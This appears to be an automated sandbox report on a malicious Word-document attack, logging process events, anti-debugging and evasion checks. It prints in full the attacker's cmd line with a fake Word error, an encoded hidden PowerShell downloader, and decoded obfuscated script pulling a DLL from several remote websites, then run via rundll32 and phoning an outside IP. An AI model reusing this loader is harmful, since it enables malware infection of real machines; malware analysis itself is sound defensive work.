Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2408 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0021109C FindFirstFileW, 15_2_0021109C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 00000008.00000003.2110699368.0000000000389000.00000004.00000001.sdmp Binary or memory string: ntnagerVMware_S
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt, 7_2_100011C0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022C4FF mov eax, dword ptr fs:[00000030h] 7_2_0022C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AC4FF mov eax, dword ptr fs:[00000030h] 8_2_002AC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CC4FF mov eax, dword ptr fs:[00000030h] 9_2_006CC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DC4FF mov eax, dword ptr fs:[00000030h] 10_2_001DC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004BC4FF mov eax, dword ptr fs:[00000030h] 11_2_004BC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007DC4FF mov eax, dword ptr fs:[00000030h] 12_2_007DC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0026C4FF mov eax, dword ptr fs:[00000030h] 13_2_0026C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_006BC4FF mov eax, dword ptr fs:[00000030h] 14_2_006BC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0021C4FF mov eax, dword ptr fs:[00000030h] 15_2_0021C4FF
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 7_2_10001B30
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10007F07

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 5.2.136.90 80 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwA